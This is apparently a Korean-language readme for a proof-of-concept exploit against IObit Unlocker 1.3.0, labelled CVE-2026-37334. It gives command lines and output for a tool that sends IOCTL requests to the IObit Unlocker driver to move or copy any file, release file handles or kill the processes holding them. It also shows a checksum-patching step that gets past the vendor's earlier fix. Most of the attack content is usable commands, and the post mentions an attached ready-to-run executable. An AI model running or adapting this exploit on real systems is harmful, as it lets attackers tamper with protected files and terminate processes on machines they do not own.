
(0 day) CVE-2026-37334 모든 파일을 이동하거나 복사합니다. 체크섬 트릭으로 이전 패치를 우회합니다. IObit Unlocker v. 1.3.0
(0-day) 모든 파일을 이동하거나 복사합니다. 체크섬 트릭을 사용하여 이전 패치를 우회합니다.
분석 문서: https://nathan2.com/files/iobit.pdf 전체 정보: https://nathan2.com/posts/iobit/
저는 이 취약점을 이전에 다른 익스플로잇이 먼저 발견했다는 사실을 모른 채 발견했습니다. 그러나 이 익스플로잇은 IObit가 만든 패치를 우회합니다. 버전 1.3.0에서 작동합니다.
사용법:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe "C:\copied.txt" "C:\t.txt" 4 1
--- 요청 전송 ---
소스: C:\copied.txt
대상: C:\t.txt
하위 유형: 4 | 플래그: 1
IOCTL 성공. 드라이버가 4바이트를 반환했습니다.
검증: 대상 파일이 존재/접근 가능합니다.
추가 플래그:
사용법: UnlockerCLI.exe <소스경로> <대상경로> <하위유형> <플래그>
예시: UnlockerCLI.exe "C:\Path With Space\file.txt" "C:\backup\file.txt" 3 (하위 유형) 5 (작업 플래그)
하위 유형: (적어도 제가 사용하는 것들) 3=이동, 4=복사
작업 플래그: 0=핸들 제거 안 함, 1 = 핸들 제거, 2 = 핸들을 가진 프로세스 종료, 4 = 프로세스 종료 및 핸들 제거, 5??? 실험용.
첨부된 실행 파일은 작동 가능하며 이미 패치되어 있어야 합니다. 그렇지 않다면 아래를 읽어보세요.
체크섬 패처를 사용하여 PoC를 패치하세요. 다음과 같이:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\checksumpatcher.exe C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe
원본 파일 크기: 235449 바이트
현재 교대 합계: 11044471
현재 XOR 합계: 43
파일에는 이미 올바른 체크섬이 있습니다. 변경이 필요 없습니다.
이렇게 하면 실행 파일이 IObitUnlocker 드라이버와 통신할 수 있습니다.